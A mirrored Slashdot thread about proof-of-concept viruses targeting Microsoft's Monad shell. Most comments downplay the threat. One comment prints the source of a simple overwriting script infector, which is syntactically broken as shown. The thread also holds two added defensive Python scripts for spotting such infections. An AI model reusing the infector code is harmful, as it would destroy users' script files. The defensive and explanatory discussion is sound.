Slashdot Mirror


Windows Vista Tool Targeted By Virus Writers

An anonymous reader writes "Five proof-of-concept viruses that target Monad, the next version of Vista's command prompt, have been published on the web. Monad is a command line interface and scripting language that is similar to Unix shells such as bash, but is based on object-oriented programming and the .Net framework. The viruses' only action is to infect other shell scripts on the host's operating system. They would cause little harm in the wild, but would be relatively easy to modify using the information from the article, said Mikko Hyppönen, the director of antivirus research at F-Secure."

12 of 293 comments

  1. Re:Short on Details by Leeji · Score: 5, Informative

    You got it right when you said "it might as well be a batch script." These are just Monad scripts running on the system, just like batch files, perl scripts, Cygwin bash scripts, Ruby scripts, etc.

    There is nothing intrinsic in Monad that enables these attacks, aside from it being a new language. In fact, Monad implements several features that help mitigate the dangers of traditional script viruses, as I outline here.

    --
    It all goes downhill from first post ...
  2. Doesn't bode well... by confusion · Score: 2, Informative

    For MS.

    But seriously, this is like tipping over someone in a wheelchair. It's a BETA of WINDOWS. Hopefully MS will learn from this before the release, though. I'm not up for a whole new vector of threats against my windows boxen.

    Jerry
    http://www.cyvin.org/

  3. Re:Comments from a Monad developer by Osty · Score: 4, Informative

    The real question is why the heck they decided to call it "Monad"?!

    The short answer: It's a codename. It won't ship with that name. Most likely it'll go with the less interesting "Microsoft Shell" or "msh".

    The long answer: Monad and Monads in functional programming (long answer has been diverted to Wikipedia, because I'm lazy).

    The non-answer: Get your mind out of the gutter, you pervert. Not everything ending in "-nad" refers to genitalia.

  4. Re:Short on Details by Owndapan · Score: 4, Informative
    I believe Monad/MSH is no longer even a part of the Longhorn release, so it is a bit unfair to have everyone jump on it as a Windows Vista exploit. From Wikipedia:
    MSH was originally slated to be shipped with Windows Vista, but has since assumed its own release schedule. Microsoft sources have confirmed MSH's first public release will most likely precede the release of Vista and be part of the next edition of Microsoft Exchange, due in the second half of 2006.
  5. An Example of One of the So-Called Viruses by AdamBa · Score: 4, Informative
    This is the verbatim text of one of the five viruses:

    $name_array=get-childitem *.msh
    foreach ($name in $name_array)
    {
    if ($name.Length -eq 249)
    $my_file=$name.Name
    }
    }

    foreach ($victim in $name_array)
    {
    if ($name.Length -ne 249)
    {
    copy-item $my_file $name.Name
    }
    }

    All it does is find every .msh file and replace its contents with itself. That's it. You could do it with a .CMD file in any version of Windows (and of course in any other scripting language).

    The other scripts get a bit more complicated (insert at a random spot in the file, etc) but that's basically it. There's no new vulnerability exposed by Monad.

    - adam
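
Added example, not part of the comment above and not code from Monad or any antivirus product: an overwriting infector like the one described leaves every script in a directory byte-identical, so a defender can sweep for clusters of same-content script files. The function name, the `.msh` default and the `min_cluster` threshold are assumptions made for this illustration.

```python
import hashlib
import os
from collections import defaultdict


def find_clone_clusters(root, ext=".msh", min_cluster=3):
    """Report directories where at least `min_cluster` script files with
    different names have byte-identical content (overwrite symptom)."""
    groups = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(ext):
                continue
            try:
                with open(os.path.join(dirpath, name), "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip it, keep sweeping
            digest = hashlib.sha256(data).hexdigest()
            groups[(dirpath, digest, len(data))].append(name)
    report = []
    for (dirpath, digest, size), names in sorted(groups.items()):
        if len(names) >= min_cluster:
            report.append({"directory": dirpath, "sha256": digest,
                           "size": size, "names": sorted(names)})
    return report


if __name__ == "__main__":
    import tempfile
    # Constructed sample tree with harmless placeholder content.
    with tempfile.TemporaryDirectory() as tmp:
        for name in ("backup.msh", "deploy.msh", "report.msh"):
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(b"# placeholder body shared by all three\n")
        with open(os.path.join(tmp, "unique.msh"), "wb") as fh:
            fh.write(b"# a script that still has its own content\n")
        for hit in find_clone_clusters(tmp):
            print(hit["directory"], hit["size"], hit["names"])
```

A hit is a lead for triage rather than proof, since templated or generated scripts can legitimately share content.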

  6. PC World has the most sensationalized version... by AdamBa · Score: 2, Informative
    Right here. "Microsoft's newest operating system in beta only a week, but already leaky." Eeek!! It claims the viruses "take advantage of a new command shell, code-named Monad, that is included in the Windows Vista beta code". Only problem is, Monad is not included in the Windows Vista beta code. Then it talks about how they "take advantage of security vulnerabilities in the new command shell". Like the ability to run scripts?

    - adam

  7. Misleading topic by Jugalator · Score: 2, Informative

    It should be "Windows XP/2003/Vista Tool Targeted By Virus Writers". It won't just be for Vista. The tool is also still in early beta, and I'm not even sure what the script did; is it a script like "rm *", or does it exploit any actual vulnerabilities? There's too little info here to know if this is anything to call news or not...

    Monad will also not be included with Windows Vista RTM.

    --
    Beware: In C++, your friends can see your privates!
  8. Re:PC World has the most sensationalized version.. by Jugalator · Score: 2, Informative

    "Only problem is, Monad is not included in the Windows Vista beta code."

    It will probably not be included in the final Windows Vista code either.
    It'll be a separate, downloadable tool for all MS OS'es since Windows XP.
    I'm still looking for the connection to Windows Vista here...

    --
    Beware: In C++, your friends can see your privates!
  9. i don't see why this is news.... by Madd+Scientist · Score: 4, Informative
    1) it's a scripting language
    2) assume you already have command line access

    a "virus" at this point is trivial... just append the code to append itself at the end of every file it assumes is a script for this command line.

    this is like batch file viruses that format the drive... it isn't anything special, it's just a matter of getting the mark to run the file. nothing to see here.

  10. Re:Short on Details by mcrbids · Score: 1, Informative

    Yes but you must remember that F-Secure are a bunch of alarmist gits who will jump at any opportunity to seed panic with regard to threats... <SNIP>

    What's funny is that f-secure makes f-prot, one of the better cheap-to-free antivirus software packages that works on both Windows and Linux.

    What I love about the Windows version is that you can run it on some old P3-450 and still end up with a working machine. Try the same with Symantec and you end up with a paperweight.

    Also, F-Prot works on Linux, and I scan some 250,000 emails per day on production mail servers using f-prot, with excellent results.

    Sorry their marketing dept. sucks, but it's a good product!

    --
    I have no problem with your religion until you decide it's reason to deprive others of the truth.
  11. Re:Short on Details by Negatif · Score: 3, Informative

    Nope, FRISK Software makes F-Prot. Not sure if you're trolling or just being misinformed.

  12. Everything that was once, will be again... by Spoing · Score: 2, Informative
    "As for not running scripts in the current directory, Monad follows a policy similar to that of Unix shells: we do not run them, unless you explicitly ask us to. This prevents malicious scripts (with names such as dir.msh, or get-childitem.msh) from intercepting your otherwise innocent attempt to list the files in that directory."

    As time goes on, they keep reinventing bits and pieces of Unix.

    --
    A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
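
Added example, not part of the comment above and not Monad's own code: on the Unix side, the policy quoted in that comment holds only while the search path contains no entry that resolves against the current directory. This audit flags such entries and lists files in a directory whose names would shadow known commands; the function names and the command list passed in are assumptions for illustration.

```python
import os


def risky_path_entries(path_value, sep=os.pathsep):
    """Return (index, entry) for search-path entries that resolve against
    the current directory: empty entries, '.', and other relative paths."""
    if not path_value:
        return []
    risky = []
    for index, entry in enumerate(path_value.split(sep)):
        # An empty entry (leading, trailing or doubled separator) is
        # treated by Unix shells as the current directory.
        if entry == "" or not os.path.isabs(entry):
            risky.append((index, entry))
    return risky


def shadowing_files(directory, command_names, script_exts=(".msh",)):
    """Return files in `directory` named like a known command, with no
    extension or a script extension (e.g. dir.msh shadowing `dir`)."""
    wanted = {c.lower() for c in command_names}
    hits = []
    for name in sorted(os.listdir(directory)):
        stem, ext = os.path.splitext(name)
        if stem.lower() in wanted and (ext == "" or ext.lower() in script_exts):
            hits.append(name)
    return hits


if __name__ == "__main__":
    # Audit the live environment and the current working directory.
    for index, entry in risky_path_entries(os.environ.get("PATH", "")):
        print(f"PATH entry {index} is relative or empty: {entry!r}")
    # Command names taken from the quoted passage; extend as needed.
    for name in shadowing_files(os.getcwd(), ["dir", "get-childitem"]):
        print(f"file shadows a command name: {name}")
```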